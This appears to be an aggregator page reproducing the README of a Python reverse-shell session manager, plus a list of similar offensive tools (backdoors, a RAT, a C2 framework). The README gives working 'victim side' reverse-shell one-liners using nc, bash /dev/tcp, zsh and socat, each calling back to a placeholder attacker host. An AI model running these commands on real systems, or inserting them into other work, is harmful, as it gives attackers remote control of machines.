All Projects → WangYihang → Reverse Shell Manager

WangYihang / Reverse Shell Manager

🔨 A multiple reverse shell session/client manager via terminal

Programming Languages

python
139335 projects - #7 most used programming language

Projects that are alternatives of or similar to Reverse Shell Manager

penelope
Penelope Shell Handler
Stars: ✭ 291 (+70.18%)
Mutual labels:  reverse-shell, ctf
Betterbackdoor
A backdoor with a multitude of features.
Stars: ✭ 195 (+14.04%)
Mutual labels:  socket, reverse-shell
easy-shell
A pure Python script to easily get a reverse shell
Stars: ✭ 48 (-71.93%)
Mutual labels:  socket, reverse-shell
EzpzShell
Collection Of Reverse Shell that can easily generate using Python3
Stars: ✭ 46 (-73.1%)
Mutual labels:  reverse-shell, ctf
GoRAT
GoRAT (Go Remote Access Tool) is an extremely powerful reverse shell, file server, and control plane using HTTPS reverse tunnels as a transport mechanism.
Stars: ✭ 34 (-80.12%)
Mutual labels:  reverse-shell, ctf
Karkinos
Penetration Testing and Hacking CTF's Swiss Army Knife with: Reverse Shell Handling - Encoding/Decoding - Encryption/Decryption - Cracking Hashes / Hashing
Stars: ✭ 115 (-32.75%)
Mutual labels:  ctf, reverse-shell
Platypus
🔨 A modern multiple reverse shell sessions manager wrote in go
Stars: ✭ 559 (+226.9%)
Mutual labels:  ctf, reverse-shell
Print My Shell
Python script wrote to automate the process of generating various reverse shells.
Stars: ✭ 140 (-18.13%)
Mutual labels:  ctf, reverse-shell
Exploits
Exploits by 1N3 @CrowdShield @xer0dayz @XeroSecurity
Stars: ✭ 154 (-9.94%)
Mutual labels:  ctf
Chronicle Network
A High Performance Network ( TCP/IP ) Library
Stars: ✭ 162 (-5.26%)
Mutual labels:  socket
Ctf.tf
A database of collected CTFs and their solutions.
Stars: ✭ 153 (-10.53%)
Mutual labels:  ctf
Kalm.js
The socket manager
Stars: ✭ 155 (-9.36%)
Mutual labels:  socket
Reversing Challenges List
CTF Reversing Challenges List
Stars: ✭ 163 (-4.68%)
Mutual labels:  ctf
Nettychat
基于Netty+TCP+Protobuf实现的Android IM库,包含Protobuf序列化、TCP拆包与粘包、长连接握手认证、心跳机制、断线重连机制、消息重发机制、读写超时机制、离线消息、线程池等功能。
Stars: ✭ 1,979 (+1057.31%)
Mutual labels:  socket
Apubplat
Devops自动化部署、堡垒机开源项目、Web Terminal
Stars: ✭ 167 (-2.34%)
Mutual labels:  socket
Androidasyncsocketexamples
This project includes a few examples on how to create different types of sockets using AndroidAsync. It includes examples for a TCP client/server, TCP client with SSL and UDP client/server.
Stars: ✭ 152 (-11.11%)
Mutual labels:  socket
Http Shutdown
Shutdown a Nodejs HTTP server gracefully by terminating the listening socket, then destroying all keep-alive idle sockets all while allowing in-flight requests to finish.
Stars: ✭ 151 (-11.7%)
Mutual labels:  socket
Lolbits
C2 framework that uses Background Intelligent Transfer Service (BITS) as communication protocol and Direct Syscalls + Dinvoke for EDR user-mode hooking evasion.
Stars: ✭ 170 (-0.58%)
Mutual labels:  reverse-shell
Oscp Pentest Methodologies
备考 OSCP 的各种干货资料/渗透测试干货资料
Stars: ✭ 166 (-2.92%)
Mutual labels:  ctf
Zero
A Lightweight Socket Service with heartbeat, Can be easily used in TCP server development.
Stars: ✭ 161 (-5.85%)
Mutual labels:  socket

Reverse Shell Manager

A multiple reverse shell sessions/clients manager via terminal

❗️ ❗️ ❗️

This project will not continue develope anymore.
The next generation of this project (Platypus) has been released at https://github.com/WangYihang/Platypus

Platypus

  • More stable
  • More features
  • Upgrade common reverse shell session to full interactive seession
  • Reverse shell as a Service
  • RESTful API
  • ...

Attacker side

python Reverse-Shell-Manager.py 0.0.0.0 4444

Victims sides

Linux

nc -e /bin/bash 1.3.3.7 4444
bash -c 'bash -i >/dev/tcp/1.3.3.7/4444 0>&1'
zsh -c 'zmodload zsh/net/tcp && ztcp 1.3.3.7 4444 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:1.3.3.7:4444  

Windows

nc.exe -e /bin/bash 1.3.3.7 4444

Simple Example Video

asciicast

YouTube Example

https://youtu.be/AoS-q1MGw30

TODO

  • [x] Add an item to crontab
  • [x] Delete an item from crontab
  • [ ] create a class to hold Master
  • [ ] select/epoll

Bugs

  • [x] A victim is connected but didn't add to online list
  • [ ] socket stuck on rece()

LICENSE

THE DRINKWARE LICENSE

<[email protected]> wrote this file. As long as 
you retain this notice you can do whatever you want 
with this stuff. If we meet some day, and you think 
this stuff is worth it, you can buy me the following
drink(s) in return.

Red Bull
JDB
Coffee
Sprite
Cola
Harbin Beer
etc

Wang Yihang
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].